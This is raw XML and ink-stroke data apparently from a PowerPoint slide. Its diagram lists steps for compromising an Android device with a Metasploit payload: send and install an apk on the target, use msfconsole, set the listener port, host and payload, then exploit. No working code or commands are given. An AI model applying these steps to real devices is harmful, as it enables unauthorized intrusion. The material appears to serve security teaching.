            <a:t>apk</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2194890" y="1012337"/>
        <a:ext cx="1557905" cy="778766"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{12D2183B-C8C1-4ADD-8BFA-63A0024D79DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="796514" y="1611119"/>
          <a:ext cx="2803597" cy="2804024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FC99C1-6CDC-4E5F-82DC-8138B26E8725}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3600111" y="2456287"/>
          <a:ext cx="1682158" cy="1121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Send </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
            <a:t> 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Install </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3600111" y="2456287"/>
        <a:ext cx="1682158" cy="1121842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4E0AE086-AABF-4A0E-98D0-5626D79C154F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1419360" y="2632777"/>
          <a:ext cx="1557905" cy="7787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Install </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0"/>
            <a:t> on target</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1419360" y="2632777"/>
        <a:ext cx="1557905" cy="778766"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{339FCDE6-ACB1-4FC6-B770-034DE4C59DA1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1774745" y="3415038"/>
          <a:ext cx="2408724" cy="2409689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08EA16-D5C5-4EE2-8A83-5B988D03B274}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4379327" y="4076144"/>
          <a:ext cx="1682158" cy="1121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Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>msfconsole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Set </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>lport.lhost,payload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exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4379327" y="4076144"/>
        <a:ext cx="1682158" cy="1121842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AED50E6-1C35-4B77-9E90-501897F8F6D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2198576" y="4255546"/>
          <a:ext cx="1557905" cy="7787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Exploit</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2198576" y="4255546"/>
        <a:ext cx="1557905" cy="7787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BFBFCC-0E31-48A0-A880-072F6899D1D6}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>4/14/2018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9B13EE-9412-42AB-AD24-C3CFF95C4A2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25715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3:56.320"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0,'39'0'219,"0"0"-203,0 0-1,0 0-15,0 0 32,1 0-1,-1 0-16,0 0 1,0 0 47,0 0 30,0 0-46,0 0 31,0 0 125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2:16.983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0,'39'0'218,"40"0"-202,-1 0 0,-39 0-1,0 0-15,0 0 16,0 0-1,0 0-15,0 0 16,0 0 0,0 0-1,0 0-15,0 0 32,1 0-17,-1 0 16,0 0-15,0 0 0,0 0-1,0 0 17,0 0-1,0 0 16,0 0 15,0 0 79,0 0-110,0 0-15,0 0 15,1 0 78,-80 0 266,1 0-375,0 0 16,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0 0 15,0 0-15,0 0 0,0 0-16,0 0 31,-1 0-16,1 0-15,0 0 32,0 0-1,0 0 0,0 0-15,0 0-1,0 0 32,0 0-15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2:26.866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0,'78'0'125,"-39"0"-110,39 0 1,1 0-1,-40 0 1,0 0 0,0 0-1,0 0-15,0 0 16,0 0 0,0 0-1,0 0-15,0 0 16,0 0-1,0 0 1,0 0 0,1 0-16,-1 0 31,0 0 0,0 0-15,0 0 15,0 0 16,0 0-16,0 0-15,0 0 15,0 0 0,0 0-31,0 0 16,0 0-16,1 0 47,-1 0-32,0 0 32,0 0 16,0 0 31,0 0-48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2:29.666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0,'39'0'125,"39"0"-109,-39 0-16,39 0 16,-39 0-16,40 0 15,-1 0 1,-39 0-16,0 0 15,0 0 1,0 0-16,0 0 16,0 0-1,0 0 1,0 0 0,0 0-16,0 0 31,1 0-16,-1 0 1,0 0 0,0 0 31,0 0-32,0 0-15,0 0 16,0 0 15,0 0-15,0 0-16,0 0 15,0 0 17,0 0-32,1 0 15,-1 0 32,0 0-31,0 0 15,0 0-15,0 0 30,0 0-14,0 0 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2:31.314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0,'78'0'110,"-39"0"-95,39 0-15,-39 0 16,0 0-16,40 0 15,-40 0 1,0 0-16,0 0 16,0 0-1,0 0-15,0 0 16,39 0 0,-39 0-1,0 0 1,0 0-1,0 0 17,1 0-17,-1 0 32,0 0-16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2:51.658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61 0,'78'0'172,"-38"0"-156,-1 0-16,0 0 31,0 0-15,0 0 15,0 0-31,39 0 328,0 0-312,0 0-16,1 0 15,-40 0 1,39 0-16,-39 0 16,0 0-1,0 0 1,0 0 15,0 0 219,39 0-234,0 0 15,1 0-31,-1 0 16,-39 0-1,39 0-15,-39 0 16,39 0-16,-39 0 16,0 0 312,40 0-313,-1 0 1,-39 0-16,0 0 16,78 0-1,0 0-15,-78 0 16,0 0-1,1-40-15,-1 40 360,39 0-329,0 0-15,-39 0-1,0 0-15,0 0 16,0 0 0,0 0-16,0 0 15,0 0 1,1 0-16,-1 0 15,0 0 1,0 0-16,0 0 31,0 0-15,0 0 15,0 0-15,0 0 62,0 0 94,0 0 15,0 0 16,0 0 157,-39 40 30,0-1-311,0 0-48,0 0 125,0 0-47,-39-39-93,0 0 15,0 0-15,0 0 0,0 0 15,0 0 0,0 0-15,0 0 31,0 0 15,0 0-15,0 0 0,0 0-16,-1 0 16,1 0-31,0 0 15,0 0 0,0 0 0,0 0-15,0 0 0,0 0 30,0 0-30,0 0 15,0 0 1,0 0 77,0 0-62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8:02.787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0,'40'0'766,"-1"0"-751,0 40 32,0-40-16,0 0 16,0 0 0,0 0 328,0 0-359,0 0-1,39 0-15,0 0 16,1 0 0,-40 0-1,0 0-15,0 0 16,39 0-1,0 0-15,-39 0 32,39 0-32,-39 0 15,1 0 1,-1 0-16,0 0 16,0 0-1,0 0 1,0 0 78,0 0-48,0 0 1,0 0 0,0 0 16,0 0-48,0 0 17,-39 39 30,39-39 172,1 0-187,-1 0-31,0 0-16,0 0 16,0 0-16,0 0 15,0 0 1,0 0-16,0 0 31,0 0-31,0 0 16,0 0-1,0 0 17,1 0-17,-1 0 16,0 0 16,0 0 47,0 0-31,0 0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7:05:02.238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0,'37'0'156,"0"0"-140,0 0-1,0 0 1,-1 0-16,1 0 16,0 37-1,0-37 1,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 15,0 0 1,-1 0-17,1 0 1,0 0 31,0 0-32,0 0 1,0 0 15,-1 0 16,1 0 0,0 0 94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8:24.356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39 0 0,'0'39'140,"0"0"-30,0 0-95,0 0 1,0 0 0,0 0 15,0 1 0,0-1 0,0 0 16,0 0 47,0 0-31,0 0-32,0 0 16,0 0 140,0 0-140,0 0 0,0 0 0,39 0 31,-39 0 31,39-39 157,0 0-157,0 0-77,0 0-1,0 0-16,0 0 32,0 0 0,0 0 0,0 0-16,1 0 16,-1 0-31,0 0-1,0 0 1,0 0 15,-39-39 1,39 39-32,0 0 15,0 0 1,0 0 62,0 0-31,0 0 15,0 0-15,0 0 63,1 0-64,-1 0 17,0 0-16,0 0 156,-39-39 78,0 0-218,0 0 15,0 0-47,0 0 63,0 0-32,0 0-30,0 0-1,0 0 63,0 0-48,0 0 1,0-1 0,0 1 47,0 0-32,-39 39 157,0 0-203,0 0-1,-1 0 1,1 0 0,0 0 15,0 0-31,0 0 16,0 0-1,0 0 16,0 0-31,0 0 16,0 0 15,0 0-15,0 0 0,0 0-16,-1 0 31,1 0-16,0 0 1,0 0 0,0 0 15,0 0-15,0 0-16,0 0 15,0 0 16,0 0-15,0 0 31,78 0 172,0 0-219,39 39 15,-39-39 1,39 0-16,-39 0 16,39 0-1,-38 0 1,-1 0-1,0 0-15,0 0 16,0 0 31,0 0 0,0 0 0,0 0 15,-39 39 63,0 1-94,-39-40-15,0 0 0,0 0-16,0 0 15,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 15,0 0 0,0 0-15,39 39 15,-39-39-15,0 0 15,117 0 188,0 39-219,1-39 15,38 0 1,0 0-16,-39 0 16,0 0-16,0 0 31,-38 0-15,-1 0-1,0 0-15,0 0 63,0 0 30,-117 39 64,0-39-142,-1 0 1,1 39-16,39-39 16,0 0-1,0 0 1,0 0-1,-39 0 1,39 0 31,0 0-47,0 0 16,-1 0 15,1 0 0,0 0 0,0 0-15,39 39 0,-39-39-16,78 0 234,39 39-218,1-39-16,-40 0 15,39 0 1,0 0-16,-39 0 15,39 0 1,-39 0 0,0 0-1,0 0 1,0 0 31,-39 39 140,-39-39-140,0 39-31,0-39-16,0 0 31,0 0-31,0 0 16,0 0-1,0 0 17,0 0-17,0 39 16,0-39-31,0 0 32,-1 0-17,1 0 1,0 0-16,0 0 62,0 0-30,0 0 15,0 0-1,39-39 189,0 0-204,0 0 63,0 0 62,0 0-125,0 0 16,78 39 141,-39 0-188,0 0 15,39 0 1,-38 39-16,38-39 16,-39 39-1,0-39 1,0 0 15,0 0 32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8:36.291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0 793 0,'0'-39'94,"0"0"-63,0 0-31,0 0 32,0 0-17,0-1-15,0 1 31,0 0-15,0 0 15,0 0 16,0 0-16,0 0 16,0 0-31,0 0 0,0 0-1,0 0 79,0 0-16,0 0 47,0-1 63,39 40-157,0 0 0,0 0-15,0 0-1,0 0-15,0 0 32,0 0-17,0 0 1,0 0 31,0 0-32,0 0 32,1 0-16,-1 0 16,0 0-15,0 0-17,0 0 1,0 0 15,0 0-15,0 0-1,0 0 17,0 0-1,0 0 0,0 0-15,0 0 31,-39-39 46,40 39-77,-1 0 31,0 0 0,0 0 93,0 0-62,0 0-15,-39 39 531,0 1-594,0-1 15,0 39 1,0-39 0,0 0-1,0 0-15,0 0 16,0 0-1,0 0 1,0 0 15,0 0 32,0 0-32,0 1 32,0-1 15,-39 0 31,39 0-31,-39-39-62,0 0-16,0 0 15,0 39-15,-1-39 16,-38 39 0,39-39-16,0 0 15,0 0 1,0 39-16,0-39 16,0 0-1,-39 0-15,39 0 31,-40 0-31,40 0 16,0 0 0,0 0-1,0 0-15,0 0 16,0 0 46,0 0-15,0 0 16,78 0 156,0 0-204,0-39 1,0 39-16,39-39 15,-39 39 1,40-39-16,-40 39 16,39-39-1,-39 39-15,0 0 16,-39-39-16,39 39 16,0 0 15,0 0 31,0 0-30,-78 0 108,-39 0-124,0 0-1,0 0-15,39 0 16,0 0 0,-1 0-1,1 0 1,0 0-16,39-39 16,-39 39-1,0 0 1,0 0-1,0 0 1,39-40 93,0 1-93,0 0 31,78 0-16,0 39-15,-39-39-1,40 39-15,-1-39 16,0 0 0,0 39-16,0-39 15,-39 39 1,0 0 15,0 0-15,0 0 15,-39-39 94,-78 39-125,39 0 16,-78 0-1,39 0-15,-39-39 16,-1 39-16,40 0 16,0-39-1,39 39-15,0 0 16,39-39-1,-39 39 1,78-39 187,0 39-187,39 0-16,-39 0 15,39 0 1,-39 0 0,1 0-16,-1 0 31,0 0-31,0 0 16,0 0-1,0 0 16,0 0-31,0 0 32,0 0-32,0 0 31,0 0-15,0 0 15,0 0-31,1 0 62,-1 0-15,0 0-16,0 0 1,-39 39-1,0 0-15,0 0-1,0 0 16,0 0 16,0 0-15,0 0-17,0 0 1,0 0-1,-78 0 1,39 0 0,-40 0-1,40-39-15,0 40 16,-78-40 0,78 0-16,0 0 15,-39 0-15,39 0 16,-40 0-1,40 0 1,0 0 0,0 0 15,39-40 47,0 1-31,39 0 0,0 39-47,0 0 47,-78 0 46,-39 0-77,0 0 0,39 0-16,0 0 15,0 0 17,0-39-1,39 0 0,0 0-15,0 0-1,39 39 17,0 0-32,0 0 15,0 0 1,0 0-16,0 0 15,0 0 157,0 0-140,0 0-17,1 0 1,-1 0-1,0 0 1,39 0-16,-39 39 31,0 39-15,0 0 0,-39 1-16,0 38 15,0 0-15,0-39 16,0 0-1,-39-78-15,39 39 16,-39-39 0,0 0-16,0 0 15,0 0 1,0 0 0,0 0-1,-1 0-15,40-39 125,0 0-109,79 0-16,-1 0 15,0 39 1,-39-39-16,39 0 16,-39 39-1,0-39-15,0 39 16,0 0-16,-78 0 125,-78 0-125,39 0 16,39 0-16,-39 0 15,39 0 1,0 0-16,0 0 15,-1 0 1,1 0 0,0 0-1,39-39 95,0 0-79,39 39-31,0-39 16,1 39-1,-1 0-15,0 0 31,0 0-31,0 0 16,-313 78 31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8:46.094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50 390 0,'0'40'172,"0"-1"-172,0 0 15,0 39 1,0-39-16,0 0 16,0 0-1,0 0 1,0 0 0,0 0-16,0 0 15,0 0-15,0 1 16,0-1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 15,0 0-15,0 0-1,0 0 1,39-39 265,0 0-265,0 0 15,0 0-15,0 0-1,0-39 1,-39 0 0,39 39-1,0 0-15,0-39 16,0 39 0,1 0 15,-1-39-16,0 39 1,0 0 0,-39-39-1,39 39 1,0 0 15,0-39-31,0 39 31,0 0 1,0 0-32,0 0 31,0 0-31,0 0 31,1 0-15,-1 0-1,0 0 1,0 0 109,-39-39 188,0 0-298,0 0 1,0-40-1,0 40-15,0 0 16,0 0 0,0 0-16,0 0 15,0 0 1,0-39 0,0 39-1,0 0-15,0-40 16,0 1-1,0 39-15,0-39 16,0 39-16,0 0 16,-78 39 296,39 0-296,-1 0-16,-38 0 31,39 39-31,0-39 16,0 39-1,-39-39 1,39 39 0,0-39-1,0 39 1,0-39 15,0 0-31,-1 0 16,1 0 46,0 0-62,0 0 16,0 0-1,0 39 1,0-39 0,0 0-1,0 0 1,39 39 156,0 0-157,0 1 1,-39-40 0,0 39-1,39 39 1,0-39-16,0 0 16,-39-39-1,39 78-15,0-39 16,0 0-1,0 0 17,0 0-17,0 0 17,0 1-17,0-80 173,39 40-188,0-39 15,-39 0 1,39 0 0,0 39-1,-39-39-15,39 0 16,0 0-1,0 0 17,0 0-17,-39 0-15,39 39 16,0-39 0,-39 0-1,39 39 1,40-39-16,-79-1 15,78 1 1,-39 39 0,-39-39-1,39 39 17,-78 0 108,0 0-140,0 0 16,-39 39-16,38-39 15,1 39 1,-39 1-16,39-1 16,0-39-1,0 39-15,0-39 32,0 39-32,0-39 15,39 39 1,-39-39-16,39 39 31,-39-39 16,78 0 62,78 0-93,-39-78-16,39 0 16,-78 39-16,79-1 15,-40-38 1,0 39-1,-39 0 1,0 39-16,0-39 16,0 0-1,0 0-15,39 39 16,-38-39 0,-1 39-1,-39-39-15,39 39 16,0 0-1,-39-39-15,39 39 16,-117 39 156,39-39-156,0 39-16,39 0 15,-79 0 1,40 39-16,0-78 15,-39 39 1,78 0-16,-39-39 31,0 39-31,0 0 32,0 1-17,0-1 16,0-39-31,39 39 16,-39 0 0,-1-39-16,40 39 15,0 0 48,0-78 77,79 39-124,-1-39-16,0 0 16,0 0-16,0-40 15,-39 79 1,0-39-16,-39 0 31,39 39-15,1 0 15,-80 0 78,-38 39-93,39 40-16,-39-40 16,0 39-1,0-39-15,0 39 16,39-39 0,-1 0-16,1 0 15,0 39 1,39-39-16,-39-39 15,0 0-15,0 40 32,39-1-17,-39-39 1,78 0 156,0-79-172,39 79 15,0-39 1,1 0-16,-79 0 16,39 0-1,39 0-15,-39 0 32,0 39-17,-78 39 173,0 0-173,0 39-15,-39 0 16,39-78 0,-1 79-16,1-40 15,39 0 1,-39 0-16,0-39 15,39 39 1,-39-39-16,39 39 16,39-39 171,0-39-187,0 0 16,0 39-16,1-39 15,-1 0 1,0 0-16,0 0 16,0 39-1,0-40 1,-39 1 0,39 39-16,0-39 15,-39 0 16,39 39 1,0 0 15,-39-39-16,39 39 0,-39-39-15,39 39-1,-39-39 17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3:58.503"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.175" units="cm"/>
      <inkml:brushProperty name="height" value="0.35" units="cm"/>
      <inkml:brushProperty name="color" value="#929292"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
      <inkml:brushProperty name="fitToCurve" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 0,'39'0'156,"0"0"-140,0 0 0,0 0-16,0 0 15,1 0 1,-1 0-16,0 0 31,0 0 0,0 0-15,0 0 0,0 0 30,0 0-30,0 0 0,0 0-1,0 0 32,0 0-31,0 0 15,1 0-15,-1 0 46,0 0-15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8:52.481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0 430 0,'78'0'47,"-39"-78"-47,1 39 15,-1-40 1,39 40-16,-39 39 16,0-39-1,0 39-15,0-39 16,-39 0 0,39 0-1,0 39-15,0-39 47,-78 78 94,-39 39-126,39 0-15,39-39 16,-39 0 0,39 1-1,-39-40 1,117 0 109,0-40-110,0-38-15,-39 78 16,40-39 0,-40 39-16,-39-39 15,39 39 1,-39-39-16,0 117 109,-39 0-93,0-39 0,39 1-16,-40-1 15,1 0 1,0-39-16,39 39 15,-39-39 1,78 0 125,0-39-141,0 39 15,-39-39-15,40 39 63,-119 39 15,40 39-62,-117 0-16,156 0 15,-39-39-15,0-39 16,39 39-1,-39-39-15,78 0 110,78-78-110,-78 0 15,0 39 1,0 0-16,0 39 16,0-39-1,-117 39 95,0 117-95,-39-39-15,39 0 16,0-39-16,39 0 16,-1 1-1,1-40 16,78 0 32,157-157-63,-118 79 16,78-39-1,-78 78-15,1-39 16,-1-1-16,-39 79 15,0-39 1,0 39-16,-39-39 16,39 39 31,-78 78 15,0-38-46,-39-1-16,39 0 15,39 0 1,-39-39-16,39 39 31,78-78 63,-39 0-94,0 0 16,0 0-1,0 39 1,-39-40 15,39 40-31,-78 0 63,-39 118-63,-39-1 15,-40 39-15,79-78 16,0 1-1,39-40 1,0 0 0,78-78 62,78-40-63,0 1-15,1-39 16,38-39-16,-39 117 16,-78 39-1,-39-39-15,39 0 16,0 39 0,-39-40-1,40 40 1,-40 40 46,-79 38-46,40-78-16,39 39 16,0 0-1,-39-39 1,39 39-1,39-78 79,0 0-78,0 39-16,-78 39 140,0 0-124,39 0-16,-39-39 16,0 39 15,78-39 47,0 0-62,0-39-1,0 0 1,1 39 0,-40 39 77,-40 39-77,-38-39 0,78 0-16,-39-39 15,0 39 1,78-39 78,0 0-79,0 0-15,0 0 31,-39 39 579</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9561">2071 352 0,'-39'0'250,"0"0"-234,0 0-1,39 39-15,-39 0 16,0-39 31,78 0 31,0 0-62,39 0-1,-39 0-15,39-39 16,-38 39 0,-1-39-1,0 39 1,0 0 31,0 0 156,0 0-188,0 0 1,39 0-16,-39 0 31,0 0-31,-39-39 16,39 39 0,-39 39 77,-78 39-77,0 0-16,0-39 16,39 39-1,39-39 1,-39-39-16,78 0 94,39 0-79,0 0 1,0 0-1,-39 0 1,-39-39-16,39 39 16,-39 39 77,-156 78-77,78 1 0,0 38-16,39-156 15,39 39 1,0 0-16,39-78 94,39-39-79,-39 78-15,0-39 16,0 39 0,-39-39-16,39 39 15,-39-39-15,39 39 31,0 0 173,1 0-204,-1 0 46,-39-39-30,0 78 62,-39 78-62,-1-39-1,-38 39-15,39-78 16,0 40 0,39-40-1,78-39 79,40-118-94,-40 40 16,0 0-1,0 0-15,-39 78 16,-39-39 0,39 39-16,0 0 15,-39-39 16,39 39-15,-39 39 31,0 0-31,0 39-1,-39 0-15,0 0 16,0-39-1,39 1-15,-39-40 16,39-79 125,39 40-126,-39 0-15,39 0 32,-39 0-32,0 78 93,0 0-77,0 157-16,-117-79 16,39-39-1,39 0-15,39-39 16,-39 0-1,39 0 17,0-117 358,39 39-390,-39-39 16,39 0 0,0 0-16,0 0 15,-39 38 1,0 1-16,39 0 31,-39 0-15,39 0 15,-39 117 250,-78 0-265,39-38-16,-39 38 15,78-39 1,-39-39 0,39 39-1,-39-39 1,-1 0 15,1-39 0,39-39 1,0 39-32,0-1 15,0 1 1,0 0 0,0 0-16,0 0 15,0 0 1,0 0 46,39 0-46,1 0 0,-1 39-1,-39-39 16,39 39-31,0 0 32,0 0-17,0 0 1,0 0 46,-78 0 48,0 0-95,-78 0 1,38 0-16,-38 0 16,78 0-1,0 0 1,0-39-16,39 0 16,0 0-1,0-1-15,-39 40 16,39-39 15,0 0-15,0 0-1,0 0 1,0 0 0,0 0-1,0 0-15,39 39 16,0-39-1,0 0-15,0 0 16,0 0 0,0 39-1,0 0 17,-39-39-17,40 39 1,-1 0-16,0 0 15,0 0 1,0 0 0,0 0-1,0 0 1,0 0 15,0 0 16,0 0 0,-117 39 62,39-39-93,-156 0 0,116 0-16,-38 0 15,-39 0 1,117-39-16,0 39 15,0-40-15,0 1 32,39 0-17,-39 39 1,39-39 0,0 0 62,0 0-47,78 39-31,-39 0 16,0 0-1,0 0 1,0 0-1,0 0 1,0 0 15,0 0 1,0 0-17,0 0 1,0 0 31,1 0-32,-1 0 17,0 0-17,-39 39-15,39-39 31,0 0 1,-39 39 61,0 0-77,0 0 15,0 0-31,39-39 47,-39 40-31,39-1 31,-39 0-16,0 0-15,0 0 15,39 0 16,-39 0 0,0 0 62,0 0-62,39-39 203,0 0-235,0 0 1,0 0 31,-39-39-16,39 39 0,1-39 1,-40 0-1,39 39-15,-39-39 46,0 0 32,0 0-63,0 0-15,0 0 46,0 78 329,0 0-376,0 0 1,0 39-16,0-39 16,0 39-1,0-39 1,0 0 0,0 39-16,0-38 15,0 38 1,0-39-1,0 0-15,0 0 16,0 0 0,0 39-16,0-39 15,0 0 1,0 0 0,0 0-1,0 1 32,0-119 141,-39 1-173,-1-39-15,1 39 16,0 0-1,0 39-15,39 0 16,0-1 0,-39 40-16,39-39 15,0 0 17,0 0 30,-39 39-46,39-39-1,0 0 17,0 0-17,-39 39 1,0-39-16,0 39 31,0 0-15,39-39-1,-39 39 1,0-39 15,0 39 16,-1 0 0,1 0-16,0 0-15,0 0 15,0 0-31,0 0 94,0 0-79,0 0 1,0 0 0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9:10.723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28 60 0,'0'39'125,"0"1"-125,0 38 15,0 0 1,0-39 0,0 0-16,0 0 31,0 0-15,0 0-1,0 0-15,0 0 31,0 0-31,0 1 16,0-1-16,0 0 31,0 0-15,0 0 0,0 0-16,0 0 31,0 0-16,0 0 1,0 0 0,0 0 15,0 0-31,0 0 16,0 1-1,0-1 16,0 0-15,39-39 0,-39 39-16,39 0 31,-39 0 0,0 0 0,39-39 1,0 39 15,1-39-32,-1 0 1,0 0 31,39 0-32,0 0 1,-39 0 15,0 0-31,0 0 16,0 0-1,0 0 17,0 0-1,1 0-15,-1 0 30,0 0 17,0 0-32,0 0-15,0-78-1,-39 39-15,0 0 32,0 0-32,39 0 15,-39-40 1,0 40 0,0 0-1,0 0-15,39 0 16,-39 0-1,0 0 1,0 0-16,0 0 16,0 0-1,0 0 17,0 0-17,0 0 1,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,0 0 48,0 0-32,0 0 0,0 0-31,-39 0 47,39 0-47,-39-1 31,0 40-31,39-39 16,-39 39 0,0 0-16,0 0 31,0-39 0,-1 39-31,1 0 16,0 0 15,0 0-31,0 0 16,0 0 15,0 0-16,0 0 17,0 0-1,0 0 0,0 0-15,0 0 15,0 0-15,-1 0 31,1 0-32,39 39 48,-39-39-63,39 39 31,0 1-15,0-1-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0 15,0 0-15,0 0-1,0 0 1,0 0 15,0 0-15,0 0-1,0 1 17,39-40 14,0 0 17,1 0 62,-1 0-78,-39-40-16,0 1-15,0 0-1,0 0 32,0 0-47,0 0 31,0 0-15,39 0 62,-39 0-31,39 39-16,-39-39-15,0 0 15,39 39 32,0 0-16,0 0-32,0 0 1,0 0 15,0 0-15,0 39-1,-39 0 1,39 0 0,0-39-1,-39 39 1,40-39-1,-40 39 1,0 0 0,0 0 15,39-39-15,-39 39 15,0 0-16,0 0 1,0 1 0,0-1 31,0 0-32,0 0-15,0 39 31,0-39-31,-39 0 16,39 0 0,0 0-1,-40 0-15,40 0 16,0 0 0,-39-39-1,39 40 16,0-1 16,0 0 0,-39-39-47,0 0 31,0 0 1,0 0-1,39-39 0,-39 39-15,39-39-1,-39-1 1,39 1-16,0 0 16,-39 0-1,39 0 17,0 0-1,0 0-16,0 0 1,0 0 15,0 0-15,0 0 0,0 0-1,0 0 16,0-1 1,0 1-32,0 0 15,0 0 17,0 0-17,39 39 1,-39-39 15,0 0 32,39 39-1,0 0 1,0 0-48,0 0 32,0 0 0,-39 39 0,0 0-16,0 0-15,39-39-1,-39 39 1,0 0 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9:19.545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39 435 0,'39'0'94,"-39"-39"-78,39 0-1,39 0-15,0 0 16,1 0-16,-1 0 16,0 0-1,0 0-15,0 0 31,-39 39-31,0-39 16,0-1 31,0 40-31,1 0-16,-1 0 15,0 0 16,0 0-15,0 0 0,0 0-1,0 0 32,0 0-31,0 0 15,0 0-15,-39 40-1,0-1 1,39-39 15,-39 39-31,0 0 31,0 0-31,0 0 32,0 0 15,0 0 15,0 0-46,0 0 15,0 0-15,0 0-1,0 0 1,0 1 15,0-1-15,0 0-1,0 0 1,-39 0 15,0 0-15,39 0-1,-39 39-15,0-78 16,39 78 0,0 0-16,-39-38 15,39-1-15,-39 0 16,39 39 0,-39-39-16,39 0 31,-39 0-16,39 0 17,0 0-17,-39-39 17,0 0-17,-1 39 1,1 0 15,0 0 16,0-39-16,0 0-15,0 0-1,0 0 1,0 0 0,0 0-1,0 0-15,0 0 32,39-39-32,-39 0 15,0 39 16,39-39-15,-40 0-16,40 0 16,0 0-1,0-39 1,-39 39-16,39 0 16,0 0-1,0 0-15,0-1 16,-39-38-1,39 39 1,0 0 0,0 0-16,0 0 31,0 0-15,0 0-1,0 0 1,0 0-16,0 0 15,0-40 1,0 1-16,0 0 16,39 39-1,-39 0 1,0 0 0,39 0 15,1 0 0,-1 39-15,39 0 15,-78-39-31,78 39 16,-39-39-1,0 39-15,0-39 31,0 39-31,0 0 16,0 0 0,-39 39 46,0 0-46,0 0-1,0 0 1,0 0-16,0 0 31,0 0 1,0 0-1,0 0-16,-78-39-15,39 39 16,-39-39 0,39 0-1,0 39 1,0-39-16,0 39 31,0-39-31,0 0 16,-1 0-1,40 40-15,-39-40 16,39 39 0,-39-39-1,0 0 17,39 39-1,-39-39-16,39 39 1,0 0 15,0 0-31,-39 0 16,39 39-16,0-39 16,0 0-1,0 0-15,-39 0 16,39 40-1,0-40 1,0 0 0,0 0-1,0 0 17,0 0-1,39-39 63,0 0-63,0 0-16,0 0 1,0 0 0,-39-39-16,39-39 15,1 0 1,-1-1-16,0 1 16,0 39-1,0-39-15,-39 0 16,39 39-1,-39 0-15,0 0 16,39 39 0,-39-39-1,0 0 1,0-1-16,0 1 16,0 0 30,0 0-30,0 0 15,-39 39-31,39-39 16,-39 39 15,0-39 32,0 39-32,0 0-15,0 0 15,-1 0 16,1 0 0,0 0 15,0 0-46,39 39 46,0 0-62,0 0 31,0 0 1,0 0-1,0 0-31,0 1 16,0-1-1,0 0 16,39-39-15,0 0 0,0 0-1,-39 39-15,40-39 32,-1 0-1,0 0-16,0 0 1,0 0 0,0 0-1,0 0-15,0 0 16,-39-39-16,39 39 16,0 0-1,0-39-15,-39 0 31,39-1-31,0 40 16,1-39 0,-1 0-1,0 0 1,0 0-16,0 0 16,0 39-1,0-39-15,-39 0 16,39 39 15,-39-39-31,39 39 47,-39-39-31,-39 